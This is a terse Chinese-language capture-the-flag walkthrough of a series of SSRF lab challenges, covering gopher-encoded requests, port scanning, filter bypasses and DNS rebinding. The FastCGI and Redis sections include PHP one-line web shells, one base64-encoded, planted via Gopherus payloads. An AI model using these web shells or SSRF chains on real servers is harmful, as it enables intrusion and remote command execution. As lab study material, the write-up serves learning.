SSRF-内网访问
1.开启环境
2.又题目得出直接访问127.0.0.1/flag.php解出答案
SSRF-伪协议读取文件
1.开启环境
2.Linux默认路径var/www/html
SSRF-端口扫描
1.开启环境
2.抓包,根据题目按配置来攻击扫描端口
找到不同的端口
访问得到结果
SSRF-POST请求
1.开启环境,抓包,将请求包删除如下
将数据包放到url解码上进行解码 http://www.hiencode.com/
复制到记事本-把%0A替换为%0D%0A,并在末尾加%0A%0D
第一次编码后的数据包复制再次编码
复制到地址框输入gopher://127.0.0.1:80/_,在后面加上复制的第二次编码,访问得到结果
SSRF-上传文件
1.开启环境
2.访问flag.php
没有提交按钮,自己去添加一个
3.浏览文件,提交抓包,将请求包删减如下图
4.将请求包编码
5.编码后放入文本文档 %0A替换%0D%0A,最后在加上一个%0D%0A
再次编码
将结果放入网址gopher://127.0.0.1:80/_,在后面加上复制的第二次编码,访问得到结果
SSRF-FastCGI协议
1.打开环境
2.使用kali生成一句话木马
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php
使用命令
python2 gopherus.py --exploit fastcgi
将编译好的编码再次编译
打开环境输入
植入成功,使用菜刀,将网址输入后加shell.php -cmd
打开根目录寻找,得到
SSRF-Redis协议
1.开启环境
2.使用kali 自己输入木马一句话
python2 gopherus.py--exploit redis
<?php @eval($_GET[cmd]);?>
将编码再次编译
输入到网址会转圈,不用理会,再次输入网址加shell.php
我们使用的是GET传参 使用命令找出答案
SSRF-URL Bypass
1.开启环境
2.根据题目得知必须包含http://notfound.ctfhub.com 在后面输入@在直接访问可得出答案
SSRF-数字IP Bypass
1.开启环境
2.根据题目得知将127限制了,可直接使用localhost得出答案
SSRF-302跳转 Bypass
1.开启环境
2.题目得知将127.0.0.1换成localhost即可
SSRF-DNS重绑定 Bypass
1.开启环境
2.根据题目打开
rbndr.us dns rebinding service
将弄好的复制到网址访问即可